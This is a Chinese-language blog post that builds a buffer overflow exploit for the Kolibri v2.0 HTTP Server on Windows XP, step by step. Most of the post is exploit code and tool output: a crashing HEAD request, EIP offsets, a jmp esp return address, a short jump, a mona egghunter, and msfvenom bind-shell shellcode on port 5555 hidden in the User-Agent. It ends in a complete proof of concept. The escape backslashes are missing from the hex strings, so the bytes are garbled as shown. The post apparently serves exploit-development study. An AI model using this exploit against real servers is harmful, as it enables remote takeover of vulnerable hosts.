Kolibri v2.0 HTTP Server

Posted 2020-11-28 vincebye

Kolibri v2.0 HTTP Server

前置知识

环境

• Windows XP Pro

• Immunity debugger

• mona.py

• python2.7

• 漏洞软件

• 坏字符:’ x00x0dx0ax3dx20x3f’

Egg hunter

寻蛋技术：为了解决缓冲区空间不足以放下shellcode,利用寻蛋技术先利用跳转到寻蛋指令，再跳转到shellcode地址

漏洞复现

生成寻蛋指令

!mona egg

Egghunter , tag w00t : 
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"
Put this tag in front of your shellcode : w00tw00t

利用下面的POC使程序崩溃

#!/usr/bin/python
import socket
import os
import sys
Stage1 = "A"*600
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1
"
"Host: 127.0.0.1:8080
"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
"
"Keep-Alive: 115
"
"Connection: keep-alive

")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()

利用pattern_create生成字符取代“A”*600

msf5 > /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 600
[*] exec: /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 600

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9

可以看到EIP偏移为515，ESP偏移为519

则新的填充字符为：A*515+[EIP]+BBBBB......

找一个跳板地址

0x7d5a30d7 : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
#小端	xd7x30x5ax7d

正常填充字符为: A*515+‘xd7x30x5ax7d‘+shellcode

而此时shellcode字符空间为81，恐无法放下shellcode代码，于是采用短跳，跳到寻蛋指令处，再利用寻蛋指令去执行shellcode代码

含短跳填充字符： A*515+‘xd7x30x5ax7d‘++"xEBxC4"

short jump code -> xEB
-60 bytes -> FFFFFFFFFFFFFFC4

此时POC代码为：

#!/usr/bin/python
  
import socket
import os
import sys
  
#Egghunter
#Size 32-bytes
hunter = (
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"
)

Stage1 = "A"*478 + hunter + "A"*5 + "xd7x30x5ax7d" + "xEBxC4"
  
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1
"
"Host: 127.0.0.1:8080
"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
"
"Keep-Alive: 115
"
"Connection: keep-alive

")
 
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()

在User-Agent中插入pattern_create生成字符

#!/usr/bin/python
  
import socket
import os
import sys
  
#Egghunter
#Size 32-bytes
hunter = (
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"
)

Stage1 = "A"*478 + hunter + "A"*5 + "xd7x30x5ax7d" + "xEBxC4"
Stage2 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1
"
"Host: 127.0.0.1:8080
"
"User-Agent: "+Stage2+"
"
"Keep-Alive: 115
"
"Connection: keep-alive

")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()

在0x7d5a30d7下断点，!mona搜索字符串，发现有足够的空间插入shellcode

最后生成插入我们的shellcode

root@ubuntu:/home/vincebye# msfvenom -p windows/shell_bind_tcp LPORT=5555 -f c -b ‘x00x0dx0ax3dx20x3f‘ 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] = 
"xbdxb6x17xbcxbbxdaxcdxd9x74x24xf4x5bx33xc9xb1"
"x53x31x6bx12x83xebxfcx03xddx19x5ex4exddxcex1c"
"xb1x1dx0fx41x3bxf8x3ex41x5fx89x11x71x2bxdfx9d"
"xfax79xcbx16x8ex55xfcx9fx25x80x33x1fx15xf0x52"
"xa3x64x25xb4x9axa6x38xb5xdbxdbxb1xe7xb4x90x64"
"x17xb0xedxb4x9cx8axe0xbcx41x5ax02xecxd4xd0x5d"
"x2exd7x35xd6x67xcfx5axd3x3ex64xa8xafxc0xacxe0"
"x50x6ex91xccxa2x6exd6xebx5cx05x2ex08xe0x1exf5"
"x72x3exaaxedxd5xb5x0cxc9xe4x1axcax9axebxd7x98"
"xc4xefxe6x4dx7fx0bx62x70xafx9dx30x57x6bxc5xe3"
"xf6x2axa3x42x06x2cx0cx3axa2x27xa1x2fxdfx6axae"
"x9cxd2x94x2ex8bx65xe7x1cx14xdex6fx2dxddxf8x68"
"x52xf4xbdxe6xadxf7xbdx2fx6axa3xedx47x5bxccx65"
"x97x64x19x13x9fxc3xf2x06x62xb3xa2x86xccx5cxa9"
"x08x33x7cxd2xc2x5cx15x2fxedx77x55xa6x0bx1dx89"
"xefx84x89x6bxd4x1cx2ex93x3ex35xd8xdcx28x82xe7"
"xdcx7exa4x7fx57x6dx70x9ex68xb8xd0xf7xffx36xb1"
"xbax9ex47x98x2cx02xd5x47xacx4dxc6xdfxfbx1ax38"
"x16x69xb7x63x80x8fx4axf5xebx0bx91xc6xf2x92x54"
"x72xd1x84xa0x7bx5dxf0x7cx2ax0bxaex3ax84xfdx18"
"x95x7bx54xccx60xb0x67x8ax6cx9dx11x72xdcx48x64"
"x8dxd1x1cx60xf6x0fxbdx8fx2dx94xcdxc5x6fxbdx45"
"x80xfaxffx0bx33xd1x3cx32xb0xd3xbcxc1xa8x96xb9"
"x8ex6ex4bxb0x9fx1ax6bx67x9fx0e";

最后的POC如下

#!/usr/bin/python
  
import socket
import os
import sys
  
#Egghunter
#Size 32-bytes
hunter = (
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
"xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"
)
shellcode=(
"xbdxb6x17xbcxbbxdaxcdxd9x74x24xf4x5bx33xc9xb1"
"x53x31x6bx12x83xebxfcx03xddx19x5ex4exddxcex1c"
"xb1x1dx0fx41x3bxf8x3ex41x5fx89x11x71x2bxdfx9d"
"xfax79xcbx16x8ex55xfcx9fx25x80x33x1fx15xf0x52"
"xa3x64x25xb4x9axa6x38xb5xdbxdbxb1xe7xb4x90x64"
"x17xb0xedxb4x9cx8axe0xbcx41x5ax02xecxd4xd0x5d"
"x2exd7x35xd6x67xcfx5axd3x3ex64xa8xafxc0xacxe0"
"x50x6ex91xccxa2x6exd6xebx5cx05x2ex08xe0x1exf5"
"x72x3exaaxedxd5xb5x0cxc9xe4x1axcax9axebxd7x98"
"xc4xefxe6x4dx7fx0bx62x70xafx9dx30x57x6bxc5xe3"
"xf6x2axa3x42x06x2cx0cx3axa2x27xa1x2fxdfx6axae"
"x9cxd2x94x2ex8bx65xe7x1cx14xdex6fx2dxddxf8x68"
"x52xf4xbdxe6xadxf7xbdx2fx6axa3xedx47x5bxccx65"
"x97x64x19x13x9fxc3xf2x06x62xb3xa2x86xccx5cxa9"
"x08x33x7cxd2xc2x5cx15x2fxedx77x55xa6x0bx1dx89"
"xefx84x89x6bxd4x1cx2ex93x3ex35xd8xdcx28x82xe7"
"xdcx7exa4x7fx57x6dx70x9ex68xb8xd0xf7xffx36xb1"
"xbax9ex47x98x2cx02xd5x47xacx4dxc6xdfxfbx1ax38"
"x16x69xb7x63x80x8fx4axf5xebx0bx91xc6xf2x92x54"
"x72xd1x84xa0x7bx5dxf0x7cx2ax0bxaex3ax84xfdx18"
"x95x7bx54xccx60xb0x67x8ax6cx9dx11x72xdcx48x64"
"x8dxd1x1cx60xf6x0fxbdx8fx2dx94xcdxc5x6fxbdx45"
"x80xfaxffx0bx33xd1x3cx32xb0xd3xbcxc1xa8x96xb9"
"x8ex6ex4bxb0x9fx1ax6bx67x9fx0e"
)
Stage1 = "A"*478 + hunter + "A"*5 + "xd7x30x5ax7d" + "xEBxC4"
Stage2 = "w00tw00t"+shellcode
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1
"
"Host: 127.0.0.1:8080
"
"User-Agent: "+Stage2+"
"
"Keep-Alive: 115
"
"Connection: keep-alive

")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()

w00t为上面!mona egg生成的寻蛋指令的标签